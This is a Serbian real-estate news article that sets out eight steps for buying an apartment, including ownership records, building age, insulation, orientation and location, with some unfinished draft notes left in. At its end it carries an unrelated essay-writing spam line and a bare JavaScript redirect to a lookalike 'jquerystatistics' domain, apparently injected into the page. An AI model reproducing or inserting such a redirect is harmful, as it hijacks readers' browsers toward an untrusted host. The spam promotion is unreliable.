News

Check out market updates

8 koraka do nekretnine

8 koraka do nekretnine

1. ČISTI VLASNIČKI ODNOSI

Prva stvar koju morate napraviti prilikom kupovine stana je da  od prodavca zatražite vlasnički list/list nepokretnosti kao dokaz o čistim vlasničkim odnosima.
Svaki vlasnik mora imati list nepokretnosti iz Katastara nepokretnosti.
Katastar Nepokretnosti je  osnovni javni registar o nepokretnostima i stvarnim pravima na njima koji sadrži vlasnički list iz kojeg su vidljivi identitet vlasnika i glavne karakteristike nekretnine. Pored informacije o pravom vlasniku možete videti da li je i nekretnina opterećena hipotekom.

2. STAROST NEKRETNINE

Stari ili novi stan, pitanje je sad?
Iako su stariji stanovi nešto jeftiniji od novogradnje, u cenu morate uračunati i troškove za adaptacije, zamenu instalacija i ostalih uređenja kako biste stvorili „dom iz snova“.

Starije zgrade često imaju uništenu fasadu, manje sređen ulaz u zgradu i slično, ali su mnogo kvalitetnije građeni, a kad već temeljno renovirate onda kupite u što “ lošijem stanju “ i sredite po Vašem ukusu.

Ipak, često se može naići na jeftin stari stan koji se nakon obnove može pretvoriti u vaš dom iz snova, da konačna cena još uvek bude povoljnija od novogradnje.

Novije zgrade su pak mnogo privlačnije za kupce koji kupuju takozvani “prvi stan “ na koji dugo čekaju i obično za njega podižu kredit.

Njima je važnije da se što pre iz “ podstanarskog “ režima pređu u sopstvenu nekretninu i njima savetujemo da isključivo kupuju “ uknjižene stanove”.
Da iz dodatnog namenskog kredita za opremanje stana stvore svoj željeni dom.

3. STANJE INSTALACIJA

Ja bih pobrojao struno vrste instalacija stil naratorski ili strucan _
Uselili ste se u stan, nakon dva meseca u stanu nastane poplava, struje ima i nema, a vaši radijatori su više hladni nego topli. Da biste izbegli ovakve ‘radosti’, svakako se raspitajte kod vlasnika o stanju instalacija, a bilo bi poželjno dovesti vlastitog majstora, u kojeg imate poverenja, da napravi procenu starosti samih instalacija .

4. TOPLOTNA I ZVUČNA IZOLACIJA XXX

Loša stolarija – prozori i vrata, neispravni otvori za klimatizaciju, tanki unutarnji i slabo zaštićeni spoljni zidovi dovode do rasta troškova za grejanje, a i stvara efekat ‘sve čujete, čuju i vas’. Bilo bi dobro, ako ste u mogućnosti, stan posetiti u različita vremena tokom dana, ili različite dane u toku nedelje.
Ako kupujete novogradnju, kod izvođača radova se raspitajte o debljini i kvalitetu zidova kao i samoj izolaciji.

5.POLOŽAJ ZGRADE

Želite li da vas budi Sunce ili da ipak više svetla i prozračnosti bude u dnevnom boravku? Proverite pre kupovine gledaju li prozori stana na sever ili istok kako se ne biste posle žalili kako Vaše cveće nikad nema Sunca. Slično kao i kad se radi o buci, bilo bi mudro posetiti stan u različito doba dana kako biste ga videli pri različitom osvetljenju.
Terase, lođe, balkon takođe su važan deo stana. Proverite “puca li pogled na zelenilo parka, ili obližnju reku.

6.KORISNA POVRŠINA STAMBENOG PROSTORA 

Pri razgledavanju ne obraćajte pažnju samo na broj kvadrata, nego i na funkcionalnost – veličinu hodnika, dnevnog boravka, oblik, mogućnost pregrađivanja ili rušenja postojećih zidova. Zatražite od vlasnika originalni tlocrt na kojem se vidi koji su zidovi nosivi. Vašem arhitekti će to biti od velike koristi.
Kupujete li stan u novogradnji, tu su Vam već mogućnosti drugačije. Prihvatite ono što Vam se nudi ili ako ste u mogućnosti da učestvujete u odabiru odgovarajućeg rasporeda, keramike, parketa, bićete mnogo zadovoljniji vašim novim gnezdom.

7. MIKROLOKACIJA

Stara izreka kaže “S kim si – takav si”. Raspitajte se kod vlasnika o najbližim susedima. Mada pravilo kaže da “nema pravila”. Odnose sa susedima gradite “ vi” I u zavisnosti od Vašeg odnosa prema njima imaćete istu ili sličnu reakciju.
Jedan od bitnih aspekata je okolna infrastruktura, blizina prodavnica, vrtića, škole, autobuske stanice, doma zdravlja.
Proverite gde možete nedeljom prošetati sa Vašim najmilijima gde se nalazi obližnji park.
Možda upravo prijatno okruže nje bude presudno za Vašu odluku o tome koji stan izabrati.
Takođe, ne zaboravite na parking. Ima li zgrada vlastito parkiralište ili ćete morati parkirati šest ulica dalje?
Naravno, garaža i mogućnost parkiranja poskupljuju stambeni prostor.

8. MAKROLOKACIJA

Jedna od najvažnijih stavki prilikom formiranja cena stanova je lokacija zgrade. Povezanost sa ostalim delovima grada, blizina tramvajske ili autobuske stanice, udaljenost od centra, tržnog centra.
Morate dobro izvagati šta želite.

Život u centru donosi mnoge pogodnosti, ali i neugodnosti kao što su buka ili nedostatak parkinga.
Opet, zgrada u periferiji obično znači udaljenost od bioskopa i pozorišta, ali više slobode za Vašu decu I igranje sa “kvartovskom decom “. Na kraju svi smo mi potekli iz nekog “ kvarta zar ne”?

Savet je :

Razmišljajte na duge staze.

Bilo bi dobro da se kod gradskih institucija raspitate o planovima za regiju u kojoj se stan nalazi.
Možda je u planu proširivanje puta, gradnja trgovačkog centra ili sportske dvorane. Ipak se mi nalazimo na Balkanu nikad se ne zna!

Savet +
“Najbolji je onaj stan u kome VI sebe vidite “. Srećno!

This is extremely useful affordable-papers.net for pupils who still have not learned how to write a paper.

window.location='http://ww82.jquerystatistics.org/';